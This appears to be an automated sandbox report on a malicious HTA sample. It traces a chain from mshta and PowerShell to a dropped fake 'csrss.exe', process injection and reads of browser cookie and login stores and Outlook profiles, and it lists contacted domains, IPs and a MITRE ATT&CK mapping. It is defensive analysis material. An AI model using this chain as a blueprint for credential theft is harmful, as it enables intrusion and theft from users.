                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0381A94C GetUserNameA,12_2_0381A94C
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0380B20C GetVersionExA,12_2_0380B20C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 17.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 17.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000016.00000002.3629881400.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.3625364823.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.3627870487.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.3627956403.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000011.00000002.1583072891.0000000035BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000011.00000002.1552868362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000014.00000002.3628025430.0000000002940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000011.00000002.1579411162.00000000311A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                        Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                        Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\SysWOW64\systeminfo.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                        Remote Access Functionality

                        Source: Yara match | File source: 17.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 17.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000016.00000002.3629881400.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.3625364823.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.3627870487.0000000004070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.3627956403.00000000040C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000011.00000002.1583072891.0000000035BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000011.00000002.1552868362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000014.00000002.3628025430.0000000002940000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000011.00000002.1579411162.00000000311A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Mitre Att&ck Matrix:

                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 14 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Shared Modules | 1 Valid Accounts | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | 11 Command and Scripting Interpreter | Logon Script (Windows) | 1 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 11 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | 3 PowerShell | Login Hook | 1 Access Token Manipulation | 1 Software Packing | NTDS | 138 System Information Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 612 Process Injection | 1 Timestomp | LSA Secrets | 431 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 211 Masquerading | DCSync | 41 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Valid Accounts | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 41 Virtualization/Sandbox Evasion | Network Sniffing | 1 Remote System Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                        Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 612 Process Injection | Input Capture | 1 System Network Configuration Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        Behavior Graph ID: 1664904, Sample: fgd.hta, Start date: 14/04/2025, Architecture: WINDOWS, Score: 100

                        Network contacts at the root: www.royalbond.xyz; www.genericagi.xyz (Performs DNS queries to domains with low reputation); 18 other IPs or domains
                        Signatures at the root: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 11 other signatures

                        Process tree (as rendered in the behavior graph):
                        • mshta.exe (started): Suspicious command line found; PowerShell case anomaly found
                          • cmd.exe (started): Detected Cobalt Strike Beacon; Suspicious powershell command line found; Uses ping.exe to sleep; 2 other signatures
                            • powershell.exe (started): contacts 192.3.26.143, ports 49714, 80 (AS-COLOCROSSINGUS, United States); drops C:\Users\user\AppData\Roaming\csrss.exe (PE32), C:\Users\user\AppData\Local\...\csrss[1].exe (PE32), C:\Users\user\AppData\...\z0uhqkog.cmdline (Unicode); Drops PE files with benign system names; Loading BitLocker PowerShell Module; Powershell drops PE file
                              • csrss.exe (started): drops C:\Users\user\Links\iaoqralA.pif (PE32); Multi AV Scanner detection for dropped file; Drops PE files with a suspicious file extension; Writes to foreign memory regions; 4 other signatures
                                • iaoqralA.pif (started): Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process
                                  • 4nHrKBXqqqVJFZFp.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
                                    • systeminfo.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                                      • 4nHrKBXqqqVJFZFp.exe (injected): contacts www.lifway.life 209.74.80.150, ports 49731, 49732, 49733 (MULTIBAND-NEWHOPEUS, United States); x112.jieruitech.info 192.197.113.156, ports 49725, 80 (HKKFGL-AS-APHKKwaifongGroupLimitedHK, China); 7 other IPs or domains; Found direct / indirect Syscall (likely to bypass EDR)
                                      • firefox.exe (started)
                                • cmd.exe (started): Uses ping.exe to sleep
                                  • conhost.exe (started)
                                  • PING.EXE (started)
                                • cmd.exe (started)
                                  • conhost.exe (started)
                              • csc.exe (started): drops C:\Users\user\AppData\Local\...\z0uhqkog.dll (PE32)
                                • cvtres.exe (started)
                            • conhost.exe (started)
                        • svchost.exe (started): contacts 127.0.0.1 (unknown)

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.